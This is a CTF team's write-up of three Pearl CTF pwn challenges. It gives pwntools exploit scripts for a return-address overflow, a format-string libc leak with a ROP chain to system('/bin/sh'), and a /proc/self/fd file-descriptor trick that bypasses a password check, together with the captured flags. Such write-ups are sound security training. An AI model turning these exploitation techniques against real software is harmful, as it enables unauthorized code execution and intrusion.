team-logo
Published on

Pearl CTF - PWN challenges

Authors

Introduction

We solved all 3 of 3 tasks. More info about this CTF is here

pwn

Table of contents

Treasure Hunt

Treasure Hunt

Solution author: kerszi

from pwn import *             

context.update(arch='x86_64', os='linux') #o tym pamietac jak sie nie pobiera danych z pliku
context.terminal = ['wt.exe','wsl.exe'] #do wsl

HOST="nc treasure-hunt.ctf.pearlctf.in 30008"
ADDRESS,PORT=HOST.split()[1:]


BINARY_NAME="./vuln"
binary = context.binary = ELF(BINARY_NAME, checksec=False)
#libc  = ELF('./libc.so.6', checksec=False)

if args.REMOTE:
    p = remote(ADDRESS,PORT)
    #p = remote(ADDRESS,PORT,ssl=True)
else:
    p = process(binary.path)    

setEligibility=binary.sym.setEligibility
winTreasure=binary.sym.winTreasure

p.sendlineafter(b"Enter the mystery key to proceed:", b"whisp3ring_w00ds")
p.sendlineafter(b"Enter the mystery key to proceed:", b"sc0rching_dunes")
p.sendlineafter(b"Enter the mystery key to proceed:", b"eldorian_ech0")
p.sendlineafter(b"Enter the mystery key to proceed:", b"shadow_4byss")

payload=72*b'A'+p64(setEligibility)+p64(winTreasure)
p.sendlineafter(b"enter the final key for the win:",payload)

p.interactive()

pearl{k33p_0n_r3turning_l0l}

Readme Please

readme.png

Solution author: Lazarus

nc readme-please.ctf.pearlctf.in 30039
Welcome to file reading service!
Enter the file name: /files/flag.txt
Enter password: 1234
Incorrect password!

Enter the file name: /proc/self/fd/3
pearl{f1l3_d3script0rs_4r3_c00l}

pearl{f1l3_d3script0rs_4r3_c00l}

Mr. %ROPOT%

mr_ropot

Solution author: kerszi

from pwn import *             
context.log_level = 'warning' 

context.update(arch='x86_64', os='linux') 
context.terminal = ['wt.exe','wsl.exe'] 

HOST="nc mr---ropot.ctf.pearlctf.in 30009"
ADDRESS,PORT=HOST.split()[1:]

BINARY_NAME="./chall_patched"
binary = context.binary = ELF(BINARY_NAME, checksec=False)
libc  = ELF('./libc.so.6', checksec=False)

if args.REMOTE:
    p = remote(ADDRESS,PORT)    
else:
    p = process(binary.path)    

payload=b'%3$p'
libc_offset=0xf4574+0x28000

p.sendlineafter(b"3. Exit", b"2")    
p.sendlineafter(b'Did you like the fact? Leave a response:',payload)

p.recvuntil(b"Your Response:\n")

recv = int(p.recvline().strip(),16)

libc.address=recv-libc_offset
warn(f"recv: {recv:#x}")
warn(f"libc: {libc.address:#x}")

str_bin_sh=next(libc.search(b"/bin/sh"))
system=libc.sym.system

rop=ROP(libc)
ret=rop.find_gadget(['ret'])[0]
pop_rdi=rop.find_gadget(['pop rdi', 'ret'])[0]

length=57
payload=length*b'A'+p64(ret)+p64(pop_rdi)+p64(str_bin_sh)+p64(system)
p.sendlineafter(b'has been recorded.',payload)

p.interactive()

pearl{fin4lly_g0t_my_fl4g_th4nks_printf}